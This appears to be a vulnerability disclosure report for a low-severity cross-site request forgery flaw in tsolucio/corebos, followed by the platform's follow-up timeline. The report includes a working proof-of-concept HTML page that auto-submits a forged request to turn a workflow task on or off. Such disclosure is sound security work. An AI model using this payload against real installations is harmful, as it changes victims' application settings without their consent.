Cross-Site Request Forgery (CSRF) in tsolucio/corebos
Valid
Reported on
Oct 18th 2021
Description
There is one more low level CSRF :
make on/off a task of workflow
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://ADDRESS/corebos/index.php">
<input type="hidden" name="module" value="com_vtiger_workflow" />
<input type="hidden" name="action" value="onofftask" />
<input type="hidden" name="task_id" value="38" />
<input type="hidden" name="isactive" value="1" />
<input type="hidden" name="return_url" value="index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=37&return_url=" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
We have contacted a member of the
tsolucio/corebos
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
tsolucio/corebos
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
tsolucio/corebos
team.
We will try again in 10 days.
2 years ago
amammad modified the report
2 years ago
amammad modified the report
2 years ago
to join this conversation